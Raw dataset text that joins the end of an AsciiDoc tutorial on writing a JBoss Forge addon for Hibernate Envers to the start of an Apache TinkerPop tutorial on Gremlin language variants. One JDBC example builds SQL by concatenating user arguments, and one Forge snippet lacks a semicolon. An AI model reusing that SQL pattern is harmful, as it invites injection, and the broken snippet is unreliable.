Envers for a project. This basically means that the command\nwill simply add the Envers library dependency to the current project POM. As with the new Forge addon, we can manually\nwrite the command class, copy and modify an existing command or let Forge itself generated it for us. Here we will go\nfor the third option.\n\nIf you are running from the command line interface, type in: +\n\n[source, console]\n----\naddon-new-ui-command --named EnversSetupCommand --commandName \"Envers: Setup\" --categories \"Auditing\"\n----\n\nWhile from the JBDS, after opening the Forge wizard (Ctrl + 4 or CMD + 4 on Mac), you should choose _Addon: New UI Command_\nand enter _EnversSetupCommand_ in the Type Name field, _Envers: Setup_ in the Command name field and add _Auditing_ to\nthe Categories list box: +\n\nimage::developing\/forge-envers-setup-command.png[title=\"Creating _Envers: Setup_ command\"]\n\nThis will generate `EnversSetupCommand` class in the `org.jboss.forge.addon.commands` package (unless you didn't specify\nexplicitly anything else). Forge makes this class extend `AbstractUICommand`, which provides some basic functionality\nlike configuring the command name, the command dialog and the command execution. 
We will go through these in this and\nthe next few sections. +\n\nThe `getMetadata()` method should be already implemented by Forge:\n\n[source, java]\n----\n @Override\n public UICommandMetadata getMetadata(UIContext context)\n {\n return Metadata.forCommand(EnversSetupCommand.class).name(\n \"Envers: Setup\").category(Categories.create(\"Auditing\"));\n }\n----\n\nThis will basically create a command that can be called _envers-setup_ from the CLI (note the substitution of colons and\nspaces by hyphens) and as _Envers: Setup_ in the _Auditing_ category in the Forge wizard: +\n\nimage::developing\/forge-envers-setup-command-wizard.png[title=\"_Envers: Setup_ command in the _Auditing_ category\"]\n\nAs the newly created command will not require any input from the user, we will leave the `initializeUI` method empty.\nHowever, in order to implement the command execution, we will need to change a little bit our class. More precisely we\nwill have to extend from another abstract command class. The rationale behind this is that we want to update the\n*current* project POM. Extending `AbstractProjectCommand` instead of `AbstractUICommand` will give us some handy\nmethods to access and manipulate the project configuration:\n\n[source, java]\n----\npublic class EnversSetupCommand extends AbstractProjectCommand\n{\n----\n\nWe will have to implement two more abstract methods coming from this parent class:\n\n[source, java]\n----\n @Override\n protected boolean isProjectRequired() \n {\n return true;\n }\n\n @Inject\n private ProjectFactory projectFactory;\n\n @Override\n protected ProjectFactory getProjectFactory() \n {\n return projectFactory;\n }\n----\n\nAfter having specified _Envers: Setup_ as a project command, we can proceed to implementing the `execute` method.\nUsually this is called when the user clicks Finish on the command dialog or in our case where we don't require input:\nwhen the user selects the command from the Forge wizard. +\n\nAs we mentioned earlier, the command will have to add the Hibernate Envers dependency to the project. We are going to\nbuild the Forge representation of this dependency using the DependencyBuilder's utility methods:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n Dependency dependency = \n DependencyBuilder.create(\"org.hibernate\")\n .setArtifactId(\"hibernate-envers\")\n .setVersion(\"4.3.6.Final\")\n .setScopeType(\"provided\");\n }\n\n----\n\nSpeaking in Maven terms, this is a dependency to artifact with ID +hibernate-envers+, coming from the +org.hibernate+\ngroup, having version 4.3.6.Final and going into the project's _provided_ scope. +\n\nAfter we have specified our dependency, we will have to add it to the project model. For that purpose we will use the\n`DependencyInstaller` utility, coming from the projects addon:\n\n[source, java]\n----\n @Inject\n private DependencyInstaller dependencyInstaller;\n----\n\nForge 2.0 is based on modular runtime called _Furnace_. The core of Furnace itself is not bound to any development model,\nso the addons can decide which of the Furnace implementations it wants to use. We created our addon with the default\nconfiguration which enables the CDI development model. That is why we asked in the code snippet above Forge to provide\nus with the dependency installer for the current project build system. 
+\n\nNow it is time to install our dependency:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n Dependency dependency =\n DependencyBuilder.create(\"org.hibernate\")\n .setArtifactId(\"hibernate-envers\")\n .setVersion(\"4.3.6.Final\")\n .setScopeType(\"provided\");\n dependencyInstaller.install(getSelectedProject(context), dependency);\n\n }\n----\n\nWe are using here one of the helper methods provided by the `AbstractProjectCommand`: `getSelectedProject()`. +\n\nNow our job is done, so it is time to report what we did. We do it by returning the result:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n Dependency dependency =\n DependencyBuilder.create(\"org.hibernate\")\n .setArtifactId(\"hibernate-envers\")\n .setVersion(\"4.3.6.Final\")\n .setScopeType(\"provided\");\n dependencyInstaller.install(getSelectedProject(context), dependency);\n return Results.success(\"Envers was successfully setup for the current project!\");\n }\n----\n\nThis will result in a SUCCESS: message in the command line interface and a green popup in the JDBS after our command is\nexecuted. +\n\nNow that we have a command the enables Hibernate Envers, it is time to add another command that will turn on auditing\nfor a given JPA entity.\n\n==== Adding some UI with the \"Envers: Audit entity\" command\n\nWe will create the class for the new command in the same way that we created the one for \"Envers: Setup\": with the help\nof Forge. If you are running the CLI, then simply type:\n\n[source, console]\n----\naddon-new-ui-command --named EnversAuditEntityCommand --commandName \"Envers: Audit entity\" --categories \"Auditing\"\n----\n\nOr alternatively in the JBDS choose _Addon: New UI Command_, enter _EnversAuditEntityCommand_ in the Type Name field,\n_Envers: Audit entity_ in the Command name field and add _Auditing_ to the Categories list box: +\n\nimage::developing\/forge-envers-audit-entity-command.png[title=\"Creating _Envers: Audit entity_ command\"]\n\nThen open the newly created class and make it extend `AbstractProjectCommand` instead of `AbstractUICommand` and also\nadd the unimplemented methods the way you did it in the setup command. +\n\nThis command will have to receive as input the entity class that has to be audited. To achieve this, we need to do two\nthings:\n\n. Obtain and configure a `UIInput` object from Furnace\n. Add our input to the `UIBuilder` in the `initializeUI` method\n\nStarting from number one, we should add the following member field to our command class:\n\n[source, java]\n----\n @Inject\n @WithAttributes(label = \"Entity to audit\", required = true)\n private UIInput<JavaResource> auditEntity;\n----\n\nHere we call our field auditEntity. This automatically will add a `--auditEntity` option to our command in the CLI.\nThe type of the field is `UIInput<JavaResource>`, which means a few things:\n\n* The JBDS integration will create a text box control for the audit entity, while the command line interface will expect\na single unbounded value\n* The type of the value for this option should be a file that represents a Java type (class, interface or enumeration)\n\nWe have also specified some additional attributes with the `@WithAttributes` annotation:\n\n* The `label` attribute tells Forge's JBDS integration to override the field name (`auditEntity` in this case) with\n_Entity to audit_. This will be the actual label of the text box in the IDE. 
This will not however change the option\nname on the command line\n* The `required` attribute will not let the user complete the dialog without entering a value for the entity. The well\nknown asterisk character will be displayed along the label in JBDS\n\nAfter we defined the input field, it is time to add it to the command dialog. In order to do that, we should edit the\n`initializeUI` method:\n\n[source, java]\n----\n @Override\n public void initializeUI(UIBuilder builder) throws Exception\n {\n builder.add(auditEntity);\n }\n----\n\nWe can tell now Forge to show a _Browse_ button to the right of the input field, which will open the well known\ntype picker of Eclipse:\n\n[source, java]\n----\n @Override\n public void initializeUI(UIBuilder builder) throws Exception\n {\n auditEntity.getFacet(HintsFacet.class).setInputType(InputType.JAVA_CLASS_PICKER);\n builder.add(auditEntity);\n }\n----\n\nIn Forge you can also set default values for a certain input. This way you can omit specifying its value on the command\nline and in the IDE it will be pre-filled in the command dialog. You can do that with the `setDefaultValue` method of the\n`UIInput`. In our case the UIInput is generified over the JavaResource class. So we'll have to check whether the current\nselection in the UI (being the CLI or JBDS) is a file that represents a Java type. If yes, we will set it as the default\nvalue of the text field:\n\n[source, java]\n----\n @Override\n public void initializeUI(UIBuilder builder) throws Exception\n {\n auditEntity.getFacet(HintsFacet.class).setInputType(InputType.JAVA_CLASS_PICKER);\n Object selection = builder.getUIContext().getInitialSelection().get();\n if (selection instanceof JavaResource)\n auditEntity.setDefaultValue((JavaResource) selection);\n builder.add(auditEntity);\n }\n----\n\nNow the UI of the command is ready. We can go on and implement the `execute` method. First we should get the value\nentered in the text field and convert it to `JavaResource`. Then we will extract the `JavaClassSource` out of it so\nthat we can manipulate things like annotations:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n JavaResource javaResource = auditEntity.getValue().reify(JavaResource.class);\n JavaClassSource javaClass = javaResource.getJavaType();\n\n }\n----\n\nNext we will check whether the chosen class has already the `Audited` annotation and if not, will add it to that. At the\nend we'll save the new content and will return successful result:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n JavaResource javaResource = auditEntity.getValue().reify(JavaResource.class);\n JavaClassSource javaClass = javaResource.getJavaType();\n if (!javaClass.hasAnnotation(\"org.hibernate.envers.Audited\")) {\n javaClass.addAnnotation(\"org.hibernate.envers.Audited\");\n }\n javaResource.setContents(javaClass);\n return Results.success(\n \"Entity \" + javaClass.getQualifiedName() + \" was successfully audited\");\n }\n----\n\nBut what if the user enters invalid input? This could be a file that does not exist, or is not a class or is not a JPA\nentity. We'll implement the `validate(UIValidationContext validator)` method to handle such situations. Whenever it\nfinds illegal input, it will add a validation error to the `validator` parameter. 
This will bring an error message if\nthe command executes in the CLI and in JBDS will disable the Finish button of the dialog, showing the error message in\nits well known location. This is how we implement the method:\n\n[source, java]\n----\n @Override\n public void validate(UIValidationContext validator)\n {\n super.validate(validator);\n try\n {\n if (!auditEntity.getValue().reify(JavaResource.class).getJavaType()\n .hasAnnotation(Entity.class))\n {\n validator.addValidationError(auditEntity,\n \"The selected class has to be JPA entity\");\n }\n }\n catch (FileNotFoundException e)\n {\n validator.addValidationError(auditEntity,\n \"You must select existing JPA entity to audit\");\n }\n }\n----\n\nFinally, we want to avoid some compilation errors in the project where we will run this command. So it should be only\navailable for execution if the user has called the setup command first, i.e. if the current project has dependency to\nHibernate Envers. You can implement this enabling and disabling in several ways. We will show one of these: by\nimplementing the `isEnabled` method. There we will again obtain the `DependencyFacet` and will ask it whether the\ndesired dependency is installed. If this method returns false, the Forge commands wizard will not list the Audit entity\ncommand and it will not be available in the command completion in CLI. This is the implementation:\n\n[source, java]\n----\n @Override\n public boolean isEnabled(UIContext context)\n {\n Dependency dependency = DependencyBuilder\n .create(\"org.hibernate\")\n .setArtifactId(\"hibernate-envers\")\n return getSelectedProject(context).getFacet(DependencyFacet.class)\n .hasEffectiveDependency(dependency);\n }\n----\n\nOur first addon is ready. We can now build it, deploy it and run it on the Java EE project that we created in the\nbeginning of this chapter.\n\n==== Installing and trying the Envers addon\n\n==== Forge configuration and Forge command execution listeners\n\nIn this final section of this chapter we will show you some more features that you could use when developing Forge\naddons. In order to showcase those, we will add a new requirement to the envers addon. Suppose that we want when we\nset it up to state that we want every new JPA entity that we create to be automatically audited. This means that the\nEnvers: Setup command should be executable more than once, but it should add the Hibernate Envers dependency in the POM\nonly the first time it was executed. +\n\nSo, our first job is to enhance our setup command with UI in the form of a checkbox that asks the user whether they\nwant their JPA entities to be automatically auditable. We'll use again the familiar `UIInput` class, but this time\nwe'll generify it with Boolean. This will tell the IDE integration of Forge to automatically create a checkbox:\n\n[source, java]\n----\n @Inject\n @WithAttributes(label = \"Audit automatically new entities\",\n description = \"Automatically make an entity auditable after it is created\")\n private UIInput<Boolean> enableAutoAudit;\n----\n\nLet's now add the checkbox to the command dialog using the `UIBuilder`:\n\n[source, java]\n----\n @Override\n public void initializeUI(UIBuilder builder) throws Exception\n {\n builder.add(enableAutoAudit);\n }\n----\n\nNext, we are going to make it possible running the setup command numerous times without polluting our POM file with as\nmany dependencies to Hibernate Envers. 
For that we are going to use something as familiar - the DependencyFacet:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n Dependency dependency = DependencyBuilder\n .create(HIBERNATE_GROUP_ID)\n .setArtifactId(ENVERS_ARTIFACT_ID)\n .setVersion(\"4.3.6.Final\")\n .setScopeType(\"provided\");\n if (!getSelectedProject(context).getFacet(DependencyFacet.class)\n .hasDirectDependency(dependency))\n {\n dependencyInstaller.install(getSelectedProject(context), dependency);\n }\n\n return Results.success(\"Envers was successfully setup for the current project!\");\n }\n----\n\nFinally we want to tell potentially other addons and commands whether the user wants or not to automatically add\nauditing to newly created JPA entities. For that we can use Forge's configuration. It is file based key-value-pair API,\nwhich can be used for storing project or Forge settings. The pairs are stored in forge.xml file. Depending whether the\nconfig concerns the project or Forge itself, it is located either in the project root directory (this is the only\nnon-project artifact that Forge creates) or under ~\/.forge directory respectively. +\n\nIn order to get hold of the project configuration, you need to ask the `ConfigurationFacet` for it:\n[source, java]\n----\n Configuration config = getSelectedProject(context)\n .getFacet(ConfigurationFacet.class)\n .getConfiguration();\n----\n\nJust for the sake of completeness, the global Forge configuration is available through CDI injection:\n\n[source, java]\n----\n @Inject\n private Configuration config;\n----\n\nUsing the configuration API is as straightforward as using the `Hashtable` API for example. We can add this line in the\n`execute` method just before the return statement:\n\n[source, java]\n----\n config.setProperty(\"autoAudit\", enableAutoAudit.getValue());\n----\n\nNow, whenever and wherever we want to find whether the user has decided to automatically audit new JPA entities, we'll\njust need to lookup the _autoAudit_ entry in the project configuration. +\n\nWe can furthermore enhance the UI of our command by reading the configuration upon building it and finding out what is\nthe current value of _autoAudit_. Based on that we can change the default value of our checkbox. For example, if the\nuser has already run the setup command and has checked the checkbox, the next time when they run it, we want it checked\nrather than unchecked. As usually we want to take care of the situation when the entry is not available at all, i.e. the\nproperty is null:\n\n[source, java]\n----\n Configuration config = getSelectedProject(builder)\n .getFacet(ConfigurationFacet.class)\n .getConfiguration();\n Object auditSettings = config.getProperty(AUTO_AUDIT_CONFIG_ENTRY);\n enableAutoAudit.setDefaultValue(\n auditSettings == null ? 
false : (Boolean) auditSettings);\n----\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"02fbfbf1b3a94c7654a5668c0b01ae8952347e9a","subject":"Minor adjustments to the language variants tutorial given restructing of reference docs CTR","message":"Minor adjustments to the language variants tutorial given restructing of reference docs CTR\n","repos":"krlohnes\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,pluradj\/incubator-tinkerpop","old_file":"docs\/src\/tutorials\/gremlin-language-variants\/index.asciidoc","new_file":"docs\/src\/tutorials\/gremlin-language-variants\/index.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\nimage::apache-tinkerpop-logo.png[width=500,link=\"http:\/\/tinkerpop.apache.org\"]\n\n*x.y.z*\n\n== Gremlin Language Variants\n\nGremlin is an embeddable query language that can be represented using the constructs of a host programming language.\nAny programming language that supports link:https:\/\/en.wikipedia.org\/wiki\/Function_composition[function composition]\n(e.g. fluent chaining) and link:https:\/\/en.wikipedia.org\/wiki\/Nested_function[function nesting] (e.g. call stacks)\ncan support Gremlin. Nearly every modern programming language is capable of meeting both requirements.\nWith Gremlin, the distinction between a programming language and a query language is not as large as they\nhave historically been. For instance, with Gremlin-Java, the developer is able to have their application code and their\ngraph database queries at the same level of abstraction -- both written in Java. A simple example is presented below\nwhere the `MyApplication` Java class contains both application-level and database-level code written in Java.\n\nimage::gremlin-house-of-mirrors.png[width=1024]\n\nWARNING: This is an advanced tutorial intended for experts knowledgeable in Gremlin in particular and TinkerPop in\ngeneral. 
Moreover, the audience should understand advanced programming language concepts such as reflection,\nmeta-programming, source code generation, and virtual machines.\n\n[source,java]\n----\npublic class MyApplication {\n\n  public static void run(String[] args) {\n\n    \/\/ assumes args[0] is a configuration file location\n    Graph graph = GraphFactory.open(args[0]);\n    GraphTraversalSource g = graph.traversal();\n\n    \/\/ assumes that args[1] and args[2] are range boundaries\n    Iterator<Map<String,Double>> result =\n          g.V().hasLabel(\"product\").\n            order().by(\"unitPrice\", asc).\n            range(Integer.valueOf(args[1]), Integer.valueOf(args[2])).\n            valueMap(\"name\", \"unitPrice\");\n\n    while(result.hasNext()) {\n      Map<String,Double> map = result.next();\n      System.out.println(map.get(\"name\") + \" \" + map.get(\"unitPrice\"));\n    }\n  }\n}\n----\n\nIn query languages like link:https:\/\/en.wikipedia.org\/wiki\/SQL[SQL], the user must construct a string representation of\ntheir query and submit it to the database for evaluation. This is because SQL cannot be expressed in Java, as the two\nlanguages use fundamentally different constructs in their expression. The same example above is presented below using SQL and the\nlink:https:\/\/en.wikipedia.org\/wiki\/Java_Database_Connectivity[JDBC] interface. The take-home point is that Gremlin does\nnot exist outside the programming language in which it will be used. Gremlin was designed to be embeddable\nin any modern programming language and thus, always free from the complexities of string manipulation as seen\nin other database and analytics query languages.\n\n[source,java]\n----\npublic class MyApplication {\n\n  public static void run(final String[] args) {\n\n    \/\/ assumes args[0] is a URI to the database\n    Connection connection = DriverManager.getConnection(args[0]);\n    Statement statement = connection.createStatement();\n\n    \/\/ assumes that args[1] and args[2] are range boundaries\n    ResultSet result = statement.executeQuery(\n      \"SELECT Products.ProductName, Products.UnitPrice \\n\" +\n      \"  FROM (SELECT ROW_NUMBER() \\n\" +\n      \"                  OVER ( \\n\" +\n      \"                    ORDER BY UnitPrice) AS [ROW_NUMBER], \\n\" +\n      \"                  ProductID \\n\" +\n      \"          FROM Products) AS SortedProducts \\n\" +\n      \"  INNER JOIN Products \\n\" +\n      \"    ON Products.ProductID = SortedProducts.ProductID \\n\" +\n      \" WHERE [ROW_NUMBER] BETWEEN \" + args[1] + \" AND \" + args[2] + \" \\n\" +\n      \"ORDER BY [ROW_NUMBER]\");\n\n    while(result.next()) {\n      System.out.println(result.getString(\"ProductName\") + \" \" + result.getDouble(\"UnitPrice\"));\n    }\n  }\n}\n----\n\nThe purpose of this tutorial is to explain how to develop a _Gremlin language variant_. That is, developers\nwho are interested in supporting Gremlin in their native language, and for whom there currently does not exist a (good) Gremlin\nvariant in that language, can develop one for the Apache TinkerPop community (and their language community in\ngeneral). In this tutorial, link:https:\/\/www.python.org\/[Python] will serve as the host language and two typical\nimplementation models will be presented.\n\n1. <<using-jython-and-the-jvm,**Using Jython and the JVM**>>: This is perhaps the easiest way to produce a Gremlin\nlanguage variant. With link:https:\/\/www.jcp.org\/en\/jsr\/detail?id=223[JSR-223], any language compiler written for the JVM\ncan directly access the JVM and any of its libraries (including Gremlin-Java).\n\n2. 
<<using-python-and-remoteconnection,**Using Python and RemoteConnection**>>: This model requires that there exist a Python\nclass that mimics Gremlin-Java's `GraphTraversal` API. With each method call of this Python class, Gremlin `Bytecode` is\ngenerated, which is ultimately translated into a Gremlin variant that can execute the traversal (e.g. Gremlin-Java).\n\nIMPORTANT: Apache TinkerPop's Gremlin-Java is considered the idiomatic, standard implementation of Gremlin.\nAny Gremlin language variant, regardless of the implementation model chosen, **must**, within the constraints of the\nhost language, be in 1-to-1 correspondence with Gremlin-Java. This ensures that language variants are collectively\nconsistent and easily leveraged by anyone versed in Gremlin.\n\nIMPORTANT: The \"Gremlin-Python\" presented in this tutorial is basic and provided to show the primary techniques used to\nconstruct a Gremlin language variant. Apache TinkerPop distributes with a full-fledged\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#gremlin-python[Gremlin-Python] variant that uses many of the\ntechniques presented in this tutorial.\n\n[[language-drivers-vs-language-variants]]\n== Language Drivers vs. Language Variants\n\nBefore discussing how to implement a Gremlin language variant in Python, it is necessary to understand two concepts\nrelated to Gremlin language development. There is a difference between a _language driver_ and a _language variant_,\nand it is important that these two concepts (and their respective implementations) remain separate.\n\n=== Language Drivers\n\nimage:language-drivers.png[width=375,float=right] A Gremlin language driver is a software library that is able to\ncommunicate with a TinkerPop-enabled graph system, whether directly via the JVM or indirectly via\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#connecting-gremlin-server[Gremlin Server] or some\nother link:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#connecting-rgp[RemoteConnection] enabled graph system.\nLanguage drivers are responsible for submitting Gremlin traversals to a TinkerPop-enabled graph system and\nreturning results to the developer in that language's type system.\nFor instance, resultant doubles should be coerced to floats in Python.\n\nThis tutorial is not about language drivers, but about language variants. Moreover, community libraries should make\nthis distinction clear and **should not** develop libraries that serve both roles. Language drivers will be useful to\na collection of Gremlin variants within a language community -- able to support `GraphTraversal`-variants as well as\nother link:https:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSL]-variants (e.g. `SocialTraversal`).\n\nNOTE: `GraphTraversal` is a particular Gremlin domain-specific language (link:https:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSL]),\nalbeit the most popular and foundational DSL. If another DSL is created, then the same techniques discussed in this\ntutorial for `GraphTraversal` apply to `XXXTraversal`.\n\n=== Language Variants\n\nimage:language-variants.png[width=375,float=right] A Gremlin language variant is a software library that allows a\ndeveloper to write a Gremlin traversal within their native programming language. 
The language variant is responsible\nfor creating Gremlin `Bytecode` that will ultimately be translated and compiled to a `Traversal` by a\nTinkerPop-enabled graph system.\n\nEvery language variant, regardless of the implementation details, will have to account for the five core concepts below:\n\n1. `Graph` (**data**): The source of the graph data to be traversed and the interface which enables the creation of a\n`GraphTraversalSource` (via `graph.traversal()`).\n\n2. `GraphTraversalSource` (**compiler**): This is the typical `g` reference. A `GraphTraversalSource` maintains the\n`withXXX()`-strategy methods as well as the \"traversal spawn\"-methods such as `V()`, `E()`, `addV()`, etc.\nA traversal source's registered `TraversalStrategies` determine how the submitted traversal will be ultimately\nevaluated.\n\n3. `GraphTraversal` (**function composition**): A graph traversal maintains the computational steps such as `out()`, `groupCount()`,\n`match()`, etc. This fluent interface supports method chaining and thus, a linear \"left-to-right\" representation of a\ntraversal\/query.\n\n4. `__` (**function nesting**): The anonymous traversal class is used for passing a traversal as an argument to a\nparent step. For example, in `repeat(__.out())`, `__.out()` is an anonymous traversal passed to the traversal parent\n`repeat()`. Anonymous traversals enable the \"top-to-bottom\" representation of a traversal.\n\n5. `Bytecode` (**language agnostic encoding**): The source and traversal steps and their arguments are encoded in a\nlanguage agnostic representation called Gremlin bytecode. This representation is a nested list of the form\n`[step,[args*]]*`.\n\nBoth `GraphTraversal` and `__` define the structure of the Gremlin language. Gremlin is a _two-dimensional language_\nsupporting linear, nested step sequences. Historically, many Gremlin language variants have failed to make the\ndistinctions above clear and, in doing so, either complicated their implementations or yielded variants that are not in\n1-to-1 correspondence with Gremlin-Java. By keeping these concepts clear when designing a language variant, the\nconstruction of the Gremlin bytecode representation is easy.\n\nIMPORTANT: The term \"Gremlin-Java\" denotes the language that is defined by `GraphTraversalSource`, `GraphTraversal`,\nand `__`. These three classes exist in `org.apache.tinkerpop.gremlin.process.traversal.dsl.graph` and form the\ndefinitive representation of the Gremlin traversal language.\n\n== Gremlin-Jython and Gremlin-Python\n\n[[using-jython-and-the-jvm]]\n=== Using Jython and the JVM\n\nimage:jython-logo.png[width=200,float=left,link=\"http:\/\/www.jython.org\/\"] link:http:\/\/www.jython.org\/[Jython] provides a\nlink:https:\/\/www.jcp.org\/en\/jsr\/detail?id=223[JSR-223] `ScriptEngine` implementation that enables the evaluation of\nPython on the link:https:\/\/en.wikipedia.org\/wiki\/Java_virtual_machine[Java virtual machine]. In other words, Jython's\nvirtual machine is not the standard link:https:\/\/wiki.python.org\/moin\/CPython[CPython] reference implementation\ndistributed with most operating systems, but instead the JVM. The benefit of Jython is that Python code and classes\ncan easily interact with the Java API and any Java packages on the `CLASSPATH`. 
In general, any JSR-223 Gremlin language\nvariant is trivial to \"implement.\"\n\n[source,python]\n----\nJython 2.7.0 (default:9987c746f838, Apr 29 2015, 02:25:11)\n[Java HotSpot(TM) 64-Bit Server VM (Oracle Corporation)] on java1.8.0_40\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import sys\n# this list is longer than displayed, including all jars in lib\/, not just Apache TinkerPop jars\n# there is probably a more convenient way of importing jars in Jython though, at the time of writing, no better solution was found.\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-console-x.y.z.jar\")\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-core-x.y.z.jar\")\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-driver-x.y.z.jar\")\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-shaded-x.y.z.jar\")\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/ext\/tinkergraph-gremlin\/lib\/tinkergraph-gremlin-x.y.z.jar\")\n# import Java classes\n>>> from org.apache.tinkerpop.gremlin.tinkergraph.structure import TinkerFactory\n>>> from org.apache.tinkerpop.gremlin.process.traversal.dsl.graph import __\n>>> from org.apache.tinkerpop.gremlin.process.traversal import *\n>>> from org.apache.tinkerpop.gremlin.structure import *\n# create the toy \"modern\" graph and spawn a GraphTraversalSource\n>>> graph = TinkerFactory.createModern()\n>>> g = graph.traversal()\n# The Jython shell does not automatically iterate Iterators like the GremlinConsole\n>>> g.V().hasLabel(\"person\").out(\"knows\").out(\"created\")\n[GraphStep(vertex,[]), HasStep([~label.eq(person)]), VertexStep(OUT,[knows],vertex), VertexStep(OUT,[created],vertex)]\n# toList() will do the iteration and return the results as a list\n>>> g.V().hasLabel(\"person\").out(\"knows\").out(\"created\").toList()\n[v[5], v[3]]\n>>> g.V().repeat(__.out()).times(2).values(\"name\").toList()\n[ripple, lop]\n# results can be interacted with using Python\n>>> g.V().repeat(__.out()).times(2).values(\"name\").toList()[0]\nu'ripple'\n>>> g.V().repeat(__.out()).times(2).values(\"name\").toList()[0][0:3].upper()\nu'RIP'\n>>>\n----\n\nMost every JSR-223 `ScriptEngine` language will allow the developer to immediately interact with `GraphTraversal`.\nThe benefit of this model is that nearly every major programming language has a respective `ScriptEngine`:\nlink:https:\/\/en.wikipedia.org\/wiki\/Nashorn_(JavaScript_engine)[JavaScript], link:http:\/\/groovy-lang.org\/[Groovy],\nlink:http:\/\/www.scala-lang.org\/[Scala], Lisp (link:https:\/\/clojure.org\/[Clojure]), link:http:\/\/jruby.org\/[Ruby], etc. A\nlist of implementations is provided link:https:\/\/en.wikipedia.org\/wiki\/List_of_JVM_languages[here].\n\n==== Traversal Wrappers\n\nWhile it is possible to simply interact with Java classes in a `ScriptEngine` implementation, such Gremlin language\nvariants will not leverage the unique features of the host language. It is for this reason that JVM-based language\nvariants such as link:https:\/\/github.com\/mpollmeier\/gremlin-scala[Gremlin-Scala] were developed. Scala provides many\nsyntax niceties not available in Java. To leverage these niceties, Gremlin-Scala \"wraps\" `GraphTraversal` in order to\nprovide Scala-idiomatic extensions. 
Another example is Apache TinkerPop's Gremlin-Groovy, which does the same via the\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#sugar-plugin[Sugar plugin], but uses\nlink:http:\/\/groovy-lang.org\/metaprogramming.html[meta-programming] instead of explicit object wrapping; \"behind the\nscenes,\" Groovy meta-programming is doing the object wrapping.\n\nThe Jython example below uses Python meta-programming to add functionality to `GraphTraversal`. In particular, the\n`__getitem__` and `__getattr__` \"magic methods\" are leveraged.\n\n[source,python]\n----\ndef getitem_bypass(self, index):\n    if isinstance(index, int):\n        return self.range(index, index + 1)\n    elif isinstance(index, slice):\n        return self.range(index.start, index.stop)\n    else:\n        raise TypeError('Index must be int or slice')\nGraphTraversal.__getitem__ = getitem_bypass\nGraphTraversal.__getattr__ = lambda self, key: self.values(key)\n----\n\nThe two methods `__getitem__` and `__getattr__` support Python _slicing_ and _object attribute interception_,\nrespectively. In this way, the host language is able to use its native constructs in a meaningful way within a\nGremlin traversal.\n\nIMPORTANT: Gremlin-Java serves as the standard\/default representation of the Gremlin traversal language. Any Gremlin\nlanguage variant **must** provide all the same functionality (methods) as `GraphTraversal`, but **can** extend it\nwith host language specific constructs. This means that the extensions **must** compile to `GraphTraversal`-specific\nsteps. A Gremlin language variant **should not** add steps\/methods that do not exist in `GraphTraversal`. If an extension\nis desired, the language variant designer should submit a proposal to link:http:\/\/tinkerpop.apache.org[Apache TinkerPop]\nto have the extension added to a future release of Gremlin.\n\n[[using-python-and-remoteconnection]]\n=== Using Python and RemoteConnection\n\nimage:python-logo.png[width=125,float=left,link=\"https:\/\/www.python.org\/\"] The JVM is a powerful piece of technology\nthat has, over the years, become a meeting ground for developers from numerous language communities. However, not all\napplications will use the JVM. Given that Apache TinkerPop is a Java framework, there must be a way for two different\nvirtual machines to communicate traversals and their results. This section presents the second Gremlin language\nvariant implementation model, which does just that.\n\nNOTE: Apache TinkerPop is a JVM-based graph computing framework. Most graph databases and processors today are built\non the JVM. This makes it easy for these graph system providers to implement Apache TinkerPop. However, TinkerPop is more\nthan its graph API and tools -- it is also the Gremlin traversal machine and language. While Apache's Gremlin traversal\nmachine was written for the JVM, its constructs are simple and can\/should be ported to other VMs for those graph systems\nthat are not JVM-based. A theoretical review of the concepts behind the Gremlin traversal machine is provided in\nlink:http:\/\/arxiv.org\/abs\/1508.03843[this article].\n\nThis section's Gremlin language variant design model does not leverage the JVM directly. Instead, it constructs a\n`Bytecode` representation of a `Traversal` that will ultimately be evaluated by a `RemoteConnection` (e.g. GremlinServer).\nIt is up to the language variant designer to choose a _language driver_ to use for submitting the generated bytecode and\ncoercing its results. 
